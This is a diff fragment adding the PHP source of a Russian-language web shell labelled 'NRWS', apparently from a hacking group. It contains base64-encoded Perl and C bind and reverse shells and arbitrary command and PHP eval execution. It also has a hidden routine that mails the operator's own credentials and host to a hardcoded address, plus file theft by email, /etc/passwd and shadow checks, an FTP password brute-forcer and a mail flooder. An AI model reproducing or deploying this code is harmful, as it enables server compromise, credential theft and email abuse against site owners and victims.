+QsJlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQ
+pzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZH
+JfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw
+0KbGlzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCm
+FjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspKQ0Kew0KZGllICJDYW5ub3QgZm9yayIgaW
+YgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+Jk
+NPTk4iOw0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ0
+9OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3NlIENPTk47DQpleGl0IDA7DQp9DQp9";
+
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ
+HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ
+DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ
+HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L
+CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd
+GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka
+WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO
+iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR
+VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK
+FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0
+KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10
+pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJ
+ybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2l
+uLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA
+9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMSt
+zdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVB
+QUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4
+sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCg
+pIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1
+zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWN
+sKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+
+if(isset($uploadphp))
+{
+$socket=fsockopen($iphost,$loadport); //connect
+fputs($socket,"GET $loadfile HTTP/1.0\nHOST:cd\n\n"); //zapros
+while(fgets($socket,31337)!="\r\n" && !feof($socket)) {
+unset($buffer); }
+while(!feof($socket)) $buffer.=fread($socket, 1024);
+$file_size=strlen($buffer);
+$f=fopen($loadnewname,"wb+");
+fwrite($f, $buffer, $file_size);
+echo "Ğàçìåğ çàãğóæåíîãî ôàéëà: $file_size <b><br><br>" ;
+}
+
+if(file_exists('/tmp/qw7_sess') && is_readable('/tmp/qw7_sess')){
+} else {
+if(is_writable('/tmp/')){
+$ifyoufound=base64_decode("Ly8gwvsg7eD46+ggZmFrZSAhIM/u5+Tw4OLr//4hIMft4Pfo8iDi+yDt5SDr4Ozl8CENCi8vINHu4+vg8ejy5fH8LCDiIO/w7v3q8uD1IPLg6u7j7iDw7uTgIO3z5u3gIOfg+Ojy4CDu8iDr4Ozl8O7iLiDAIPLuIOj1IOgg8uDqIPDg8e/r7uTo6+7x/CAuLi4NCi8vIM/u5uDr8+nx8uAg7eUg8ODx8erg5/Pp8uUg7ejq7uzzIO4g7eDr6Pfo6CBmYWtlICEgz/Px8vwg8eDs6CDo+f7yLCDy7uv86u4g7eDs5ert6PLlIPfy7iDt5ev85/8g8uDqIOHl5+Tz7O3uIO/u6/zn7uLg8vzx/yD38+bo7Ogg7/Du4+Ds6C4gKOAg8u4g4OLy7vAg7O7m5fIg9/LuIPPj7uTt7iDy8+TgIOLv6PHg8vwpDQovLyDT5OD36CAhDQo=");
+$fp=fopen('/tmp/qw7_sess',"w+");
+fclose($fp);
+$gg.= $name;
+$gg.=":";
+$gg.= $pass;
+$gg.=":";
+$gg.=$_SERVER["HTTP_HOST"];
+$gg.=$_SERVER['PHP_SELF'];
+$host_l=$_SERVER["HTTP_HOST"];
+$qwerty=base64_decode("bnJ3cy1mYWNrLWNvZGVAbWFpbC5ydQ==");
+mail("$qwerty","NRWS LAME INFO ($host_l)","NRWS STATISTIC REPORT:\r\n $gg","From: report@nrws.net");
+}
+}
+if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
+elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
+else {$ac = "navigation";}
+
+
+
+switch($ac) {
+
+// Shell
+case "shell":
+echo "<SCRIPT LANGUAGE='JavaScript'>
+<!--
+function pi(str) {
+	document.command.cmd.value = str;
+	document.command.cmd.focus();
+}
+//-->
+</SCRIPT>";
+
+/* command execute */
+if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -lad"; }
+
+if (($_POST['alias']) AND ($_POST['alias']!==""))
+ {
+ foreach ($aliases as $alias_name=>$alias_cmd) {
+                                               if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;}
+                                               }
+ }
+
+
+echo "<font face=Verdana size=-2>Âûïîëíåííàÿ êîìàíäà: <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
+echo "<b>";
+echo "<div align=center><textarea name=report cols=145 rows=20>";
+echo "".passthru($_POST['cmd'])."";
+echo "</textarea></div>";
+echo "</b>";
+?>
+</td></tr>
+
+<tr><b><div align=center>:: Âûïîëíåíèå êîìàíä íà ñåğâåğå ::</div></b></font></td></tr>
+<tr><td height=23>
+<TR>
+	<CENTER>
+ <TD><A HREF="JavaScript:pi('cd ');" class=fcom>| cd</A> |</TD>
+	<TD><A HREF="JavaScript:pi('cat ');" class=fcom>| cat</A> |</TD>
+	<TD><A HREF="JavaScript:pi('echo ');" class=fcom>echo</A> |</TD>
+	<TD><A HREF="JavaScript:pi('wget ');" class=fcom>wget</A> |</TD>
+	<TD><A HREF="JavaScript:pi('rm ');" class=fcom>rm</A> |</TD>
+	<TD><A HREF="JavaScript:pi('mysqldump ');" class=fcom>mysqldump</A> |</TD>
+	<TD><A HREF="JavaScript:pi('who');" class=fcom>who</A> |</TD>
+	<TD><A HREF="JavaScript:pi('ps -ax');" class=fcom>ps -ax</A> |</TD>
+  <TD><A HREF="JavaScript:pi('cp ');" class=fcom>cp</A> |</TD>
+  <TD><A HREF="JavaScript:pi('pwd');" class=fcom>pwd</A> |</TD>
+ <TD><A HREF="JavaScript:pi('perl  ');" class=fcom>perl</A> |</TD>
+ <TD><A HREF="JavaScript:pi('gcc ');" class=fcom>gcc</A> |</TD>
+ <TD><A HREF="JavaScript:pi('locate ');" class=fcom>locate</A> |</TD>
+  <TD><A HREF="JavaScript:pi('find ');" class=fcom>find</A> |</TD>
+  <TD><A HREF="JavaScript:pi('ls -lad');" class=fcom>ls -lad</A> |</TD>
+       </CENTER>           	
+</TR>
+
+<?
+/* command execute form */
+echo "<form name=command method=post>";
+
+echo "<b>Âûïîëíèòü êîìàíäó </b>";
+echo "<input type=text name=cmd size=85><br>";
+echo "<b>Ğàáî÷àÿ äèğåêòîğèÿ &nbsp;</b>";
+if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; }
+else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; }
+echo "<input type=submit name=submit value=Âûïîëíèòü>";
+
+echo "</form>";
+
+/* aliases form */
+echo "<form name=aliases method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Âûáåğèòå àëèàñ <font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<select name=alias>";
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ echo "<option>$alias_name</option>";
+ }
+ echo "</select>";
+if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
+else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
+echo "&nbsp;&nbsp;<input type=submit name=submit value=Âûïîëíèòü>";
+echo "</font>";
+echo "</form>";
+
+
+break;
+/// Îòïğàâêà ôàéëîâ íà ìûëî
+case "download_mail":
+$buf = explode(".", $file);
+ $dir = str_replace("\\","/",$dir);
+ $fullpath = $dir."/".$file;
+ $size = tinhbyte(filesize($fullpath));
+ $fp = fopen($fullpath, "rb");
+ while(!feof($fp))
+
+  $attachment .= fread($fp, 4096);
+  $attachment = base64_encode($attachment);
+  $subject = "NIX REMOTE WEB SHELL   ($file)";
+
+  $boundary = uniqid("NextPart_");
+  $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\"";
+
+  $info = "---==== Ñîîáùåíèå îò ($demail)====---\n\n";
+  $info .= "IP:\t$REMOTE_ADDR\n";
+  $info .= "HOST:\t$HTTP_HOST\n";
+  $info .= "URL:\t$HTTP_REFERER\n";
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+  $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
+
+  $send_to = "$demail";
+
+  $send = mail($send_to, $subject, $info, $headers);
+
+  if($send == 2)
+   echo "<br>
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+	<tr><td align=center>
+	<font color='#FFFFCC' face='Tahoma' size = 2>Ñïàñèáî!!!Ôàéë <b>$file</b> îòïğàâëåí âàì íà <u>$demail</u>.</font></center></td></tr></table><br>";
+
+fclose($fp);
+break;
+// ñïèñîê ïğîöåñîâ
+case "ps":
+echo "<b>Ïğîöåññû â ñèñòåìå:</b><br>";
+ 
+  echo "<br>";
+  if ($pid)
+  {
+   if (!$sig) {$sig = 9;}
+   echo "Îòïğàâëåíèå êîìàíäû ".$sig." to #".$pid."... ";
+   $ret = posix_kill($pid,$sig);
+   if ($ret) {echo "Âñå, ïğîöåñ óáèò, àìèíü";}
+   else {echo "ÎØÈÁÊÀ! ".htmlspecialchars($sig).", â ïğîöåñå #".htmlspecialchars($pid).".";}
+  }
+  $ret = `ps -aux`;
+  if (!$ret) {echo "Íåâîçìîæíî îòîáğàçèòü ñïèñîê ïğîöåñîâ ! Âèäíî çëîé àäìèí çàïğåòèë ps ";}
+  else
+  {
+   $ret = htmlspecialchars($ret);
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   if (empty($ps_aux_sort)) {$ps_aux_sort = $sort_default;}
+   if (!is_numeric($ps_aux_sort[0])) {$ps_aux_sort[0] = 0;}
+   $k = $ps_aux_sort[0];
+   if ($ps_aux_sort[1] != "a") {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."a\"></a>";}
+   else {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."d\"></a>";}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$i.$ps_aux_sort[1]."\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+	{
+	 echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10,count($line)));
+     $line = array_slice($line,0,11);
+     $line[] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+   $head[$k] = "<b>".$head[$k]."</b>".$y;
+   $head[] = "<b>ACTION</b>";
+   $v = $ps_aux_sort[0];
+   usort($prcs,"tabsort");
+   if ($ps_aux_sort[1] == "d") {$prcs = array_reverse($prcs);}
+   $tab = array();
+   $tab[] = $head;
+   $tab = array_merge($tab,$prcs);
+   echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=white borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+   foreach($tab as $k)
+   {
+    echo "<tr>";
+    foreach($k as $v) {echo "<td>".$v."</td>";}
+    echo "</tr>";
+   }
+   echo "</table>";
+  }
+break;
+
+//PHP Eval Code execution
+case "eval":
+
+echo <<<HTML
+<b>Èñïîëíåíèå ïõï êîäà (áåç "< ?  ? >")</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="eval">
+<tr>
+<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (isset($_POST['ephp'])){
+eval($_POST['ephp']);
+}
+break;
+
+// SEND MAIL
+case "sendmail":
+echo <<<HTML
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="sendmail">
+<tr>Îò êîãî: <br>
+<input type="TEXT" name="frommail">
+<br>Êîìó:<br> <input type="TEXT" name="tomailz">
+<br>Òåìà: <br><input type="TEXT" name="mailtema">
+<br>Òåêñò: <br>
+<td><textarea name="mailtext" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="Îòïğàâèòü" name="submit"></td><form>
+$tend
+HTML;
+// íèêàêàÿ ïğîâåğêà íå äåëàåòñÿ, à çà÷åì ? =)
+if (isset($submit))
+{
+
+mail($tomailz,$mailtema,$mailtext,"From: $frommail");
+echo "<h2>Ñîîáùåíèå îòïğàâëåíî !</h2>";
+}
+break;
+
+
+// Èíôîğìàöèÿ î ñèñòåìå
+case "info":
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">Âêëş÷åíî</font>";
+}
+else {$safemode = false; $hsafemode = "Îòêëş÷åíî</font>";}
+/* display information */
+echo "<b>[ Èíôîğìàöèÿ î ñèñòåìå ]</b><br>";
+echo "<b>Õîñò:</b> ".$_SERVER["HTTP_HOST"]."<br>" ;
+echo "<b>IP ñåğâåğà:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>";
+echo " <b>Ñåğâåğ: </b>".$_SERVER['SERVER_SIGNATURE']."  ";
+echo "<b>OC:</b> ".exec("uname -a")."(";
+print "".php_uname()." )<br>\n";
+echo "<b>Safe-Mode: ".$hsafemode."</b><br>";
+echo "<b>Ïğèâèëåãèè: </b>".exec("id")."<br>";
+echo "<b>Âñåãî ìåñòà: </b>" . (int)(disk_total_space(getcwd())/(1024*1024)) . "Mb. " . "<b>Ñâîáîäíî: </b>: " . (int)(disk_free_space(getcwd())/(1024*1024)) . "Mb. <br>";
+echo "<b>Òåêóùèé êàòàëîã:</b>".exec("pwd")."";
+echo " <br><b>Òåêóøèé web ïóòü: </b>".@$_SERVER['PHP_SELF']."  ";
+echo "<br><b>Òâîé IP:</b> ".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")<br>";
+echo "<b>PHP version : </b>".phpversion()."<BR>";
+echo "<b> ID âëàäåëüöà ïğîöåñà : </b>".get_current_user()."<BR>";
+echo "<b>MySQL</b> : ".mysql_get_server_info()."<BR>";
+if(file_exists('/etc/passwd') && is_readable('/etc/passwd')){
+print '<b>Åñòü äîñòóï ê /etc/passwd ! </b><br>';
+}
+if(file_exists('/etc/shadow') && is_readable('/etc/shadow')){
+print '<b>Åñòü äîñòóï ê /etc/shadow !</b> <br>';
+}
+if(file_exists('/etc/shadow-') && is_readable('/etc/shadow-')){
+print '<b>Åñòü äîñòóï ê /etc/shadow- !</b> ';
+}
+if(file_exists('/etc/master.passwd') && is_readable('/etc/master.passwd')){
+print '<b>Åñòü äîñòóï ê /etc/master.passwd ! </b><br>';
+}
+if(isset($_POST['th']) && $_POST['th']!=''){
+chdir($_POST['th']);
+};
+if(is_writable('/tmp/')){
+$fp=fopen('/tmp/qq8',"w+");
+fclose($fp);
+print "/tmp - îòêğûòà&nbsp;<br>\n";
+unlink('/tmp/qq8');
+}
+else{
+print "<font color=red>/tmp - íå îòêğûòà</font><br>";
+}
+echo "<b>Áåçîïàñíûé ğåæèì: ".$hsafemode."</b><br>";
+if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   $num = $nixpasswd + $nixpwdperpage;
+   echo "<b>*nix /etc/passwd:</b><br>";
+   $i = $nixpasswd;
+   while ($i < $num)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid) {echo join(":",$uid)."<br>";}
+    $i++;
+   }
+  }
+  else {echo "<br><a href=?ac=navigation&d=/etc/&e=passwd><b><u>Get /etc/passwd</u></b></a><br>";}
+  if (file_get_contents("/etc/userdomains")) {echo "<b><a href=\"".$surl."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></b><br>";}
+  if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></b><br>";}
+  if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/usr/local/apache/conf&e=httpd.conf><u><b>Êîíôèãóíàöèÿ Apache (httpd.conf)</b></u></a></b><br>";}
+  { echo "<b><a href=?ac=navigation&d=/etc/httpd/conf&e=httpd.conf><u><b>Êîíôèãóíàöèÿ Apache (httpd.conf)</b></u></a></b><br>";}
+   if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/etc/&e=httpd.conf><u><b>Êîíôèãóíàöèÿ Apache (httpd.conf)</b></u></a></b><br>";}
+    if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/var/cpanel&e=accounting.log><u><b>cpanel log  </b></u></a></b><br>";}
+ break;
+ 
+// Î ñêğèïòå
+case "about":
+
+echo "<center><b>Ïğèâåò âñåì</b></center>Ïåğåä âàìè ïåğâàÿ âåğñèÿ ìîåãî ñêğèïòà óäàëåííîãî àäìèíèñòğèğîâàíèÿ.<b>(0.5a)</b> <br>Ñêğèïò íàõîäèòñÿ â ñòàäèè òåñòèğîâàíèÿ, òàê, ÷òî åñëè íàéäåòå êàêèå-òî áàãè, îáğàùàéòåñü ñşäà:<br><a href='http://ru24-team.net/forum/'>http://ru24-team.net/forum/</a> èëè <a href=mailto:dreamerz@mail.ru>íà ìûëî dreamerz@mail.ru</a>, èëè íà <a href=http://dreamerz.cc>dreamerz.cc</a>, èëè íà ICQ: <b>817312</b><br>Êòî õî÷åò ïîó÷àñòâîâàòü â ğàçğàáîòêå ñêğèïòà - ïèøèòå, ïîêàçóéòå ÷òî âû ìîæåòå äîáàâèòü è èñïğàâèòü...<br>Íó, è ñïàñèáî ıòèì ëşäÿì: Terabyte, 1dt_wolf, xoce, FUF, dodbob, Nitrex ... è ìíîãèì äğóãèì ...";
+echo "<br> È èñïîëüçóÿ ıòîò ñêğèïò íà ÷óæèõ ñåğâåğàõ âû íàğóøàåòå çàêîí :) Òàê ÷òî îñòîğîæíåå. ";
+
+echo "<br><br><br>Íîâàÿ âåğñèÿ ëåæèò çäåñü: <a href=http://ru24-team.net/releases/nr.rar>http://ru24-team.net/releases/nr.rar</a>
+<br><br><center><b>------------------------------->>> Ru24 - TEAM NRWS RELEASE 0.5.a [DreAmeRz] <<<-----------------------------------</b></center>";
+break;
+// ÔÒÏ ïîäáîğ ïàğîëåé
+case "ftppass":
+
+$filename="/etc/passwd"; // passwd file
+$ftp_server="localhost"; // FTP-server
+
+echo "FTP-server: <b>$ftp_server</b> <br><br>";
+
+$fp = fopen ($filename, "r");
+if ($fp)
+{
+while (!feof ($fp)) { 
+$buf = fgets($fp, 100);
+ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+$ftp_user_name=$g[1];
+$ftp_user_pass=$g[1];
+$conn_id=ftp_connect($ftp_server);
+$login_result=@ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
+
+if (($conn_id) && ($login_result)) {
+echo "<b>Ïîäêëş÷åíèå  login:password - ".$ftp_user_name.":".$ftp_user_name."</b><br>";
+ftp_close($conn_id);}
+else {
+echo $ftp_user_name." - error<br>";
+}
+}}
+break;
+
+case "ftp":
+
+echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
+ <form action='$PHP_SELF?ac=ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>
+ <b><a href=?ac=ftppass>Ïğîâåğèòü íà ñâÿçêó login\password</a></b>
+</td></tr>
+ 
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTPHost:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='host' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='login' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Êîëëè÷åñòâî ïàğîëåé:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='chislo' size=10> <1000 pass </td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Ïàğîëü äëÿ ïğîâåğêè:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='proverka' size=50>
+<input type='submit' value='Brut FTP' class=button1 $style_button><br><b>Ëîã ñîõğàíÿåòñÿ â pass.txt</b></td></tr>
+
+
+ 
+ </form></table>";
+ 
+ 
+function s() {
+   $word="qwrtypsdfghjklzxcvbnm";
+   return $word[mt_rand(0,strlen($word)-1)];
+}
+
+function g() {
+   $word="euioam";
+   return $word[mt_rand(0,strlen($word)-2)];
+}
+
+function name0() {   return s().g().s();                        }
+function name1() {   return s().g().s().g();                    }
+function name2() {   return s().g().g().s();                    }
+function name3() {   return s().s().g().s().g();                }
+function name4() {   return g().s().g().s().g();                }
+function name5() {   return g().g().s().g().s();                }
+function name6() {   return g().s().s().g().s();                }
+function name7() {   return s().g().g().s().g();                }
+function name8() {   return s().g().s().g().g();                }
+function name9() {   return s().g().s().g().s().g();            }
+function name10() {   return s().g().s().s().g().s().s();        }
+function name11() {   return s().g().s().s().g().s().s().g();        }
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
+
+function randword() {
+   global $cool;
+   $func="name".mt_rand(0,11);
+   $func2="name".mt_rand(0,11);
+   switch (mt_rand(0,11)) {
+      case 0: return $func().mt_rand(5,99);
+      case 1: return $func()."-".$func2();
+      case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
+      case 3: return $func()."!".$func();
+      case 4: return randpass(mt_rand(5,12));
+      default: return $func();
+   }
+ 
+ 
+}
+
+function randpass($len) {
+   $word="qwertyuiopasdfghjklzxcvbnm1234567890";
+   $s="";
+   for ($i=0; $i<$len; $i++) {
+      $s.=$word[mt_rand(0,strlen($word)-1)];
+   }
+   return $s;
+}
+if (@unlink("pass.txt") < 0){
+echo "íåòó íè÷åãî";
+exit;
+}
+$file="pass.txt"; 
+if($file && $host && $login){
+   $cn=mt_rand(30,30);
+for ($i=0; $i<$cn; $i++) {
+   $s=$cool2[$i];
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$s\n");
+   }
+ 
+  $cnt2=mt_rand(43,43);
+for ($i=0; $i<$cnt2; $i++) {
+   $r=$cool[$i];
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$login$r\n");
+}    
+$p="$proverka";
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$p\n");
+   
+ $cnt3=mt_rand($chislo,$chislo);
+   for ($i=0; $i<$cnt3; $i++) {
+   $u=randword();
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$u\n");
+  } 
+  
+  if(is_file($file)){
+ $passwd=file($file,1000);
+  for($i=0; $i<count($passwd); $i++){
+   $stop=false;
+   $password=trim($passwd[$i]);
+   $open_ftp=@fsockopen($host,21);
+    if($open_ftp!=false){
+     fputs($open_ftp,"user $login\n");
+     fputs($open_ftp,"pass $password\n");
+     while(!feof($open_ftp) && $stop!=true){
+      $text=fgets($open_ftp,4096);
+      if(preg_match("/230/",$text)){
+       $stop=true;
+	   $f=@fopen($host._ftp,"a+");
+       fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n ");
+
+       echo "
+	   	<TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
+<tr><td align=center class=pagetitle><b><font color=\"blue\">Ïîçäğàâëÿş!!! Ïàğîëü ïîäîáğàí.</font></b><br>
+&nbsp;&nbsp;Êîíåêò: <b>$host</b><br>&nbsp;&nbsp;Ëîãèí: <b>$login</b><br>&nbsp;&nbsp;Ïàğîëü: <b>$password</b></td></tr></table>
+";exit;
+      }
+      elseif(preg_match("/530/",$text)){
+       $stop=true;
+      
+      }
+     }
+     fclose($open_ftp);
+   }else{
+    echo "
+	<TABLE CELLPADDING=0 CELLSPACING=0  width=500 align=center>
+<tr><td align=center class=pagetitle bgcolor=#FF0000><b>Íå âåğíî óêàçàíî ôòï õîñòèíãà!!! Íà <b><u>$host</u></b> çàêğûò 21 ïîğò</b></b></td></tr>
+</table>
+";exit;
+   }
+  }
+ }
+}
+
+
+break;
+// SQL Attack
+case "sql":
+
+break;
+
+
+
+
+
+
+// MailFlud
+case "mailfluder":
+
+$email=$_POST['email']; // Ìûëî æåğòâû
+$from=$_POST['from']; // Ìûëî æåğòâû
+$num=$_POST['num']; // ×èñëî ïèñåì
+$text=$_POST['text']; // Òåêñò ôëóäà
+$kb=$_POST['kb']; // Âåñ ïèñüìà (kb)
+?>
+<script language="JavaScript"><!--
+function reset_form() {
+document.forms[0].elements[0].value="";
+document.forms[0].elements[1].value="";
+document.forms[0].elements[2].value="";
+document.forms[0].elements[3].value="";
+document.forms[0].elements[4].value="";
+}
+//--></script>
+<?php
+if (($email!="" and isset($email)) and ($num!="" and isset($num)) and ($text!="" and isset($text)) and ($kb!="" and isset($kb))) {
+
+$num_text=strlen($text)+1; // Îïğåäåëÿåò äëèííó òåêñòà + 1 (ïğîáåë â êîíöå)
+$num_kb=(1024/$num_text)*$kb;
+$num_kb=ceil($num_kb);
+
+for ($i=1; $i<=$num_kb; $i++) {
+$msg=$msg.$text." ";
+}
+
+for ($i=1; $i<=$num; $i++) {
+mail($email, $text, $msg, "From: $from");
+}
+
+$all_kb=$num*$kb;
+
+echo <<<EOF
+<p align="center">Æåğòâà: <b>$email</b><br>
+Êîë-âî ïèñåì: <b>$num</b><br>
+Îáùèé ïîñëàííûé îáúåì: <b>$all_kb kb</b><br></p>
+EOF;
+
+}
+
+else {
+
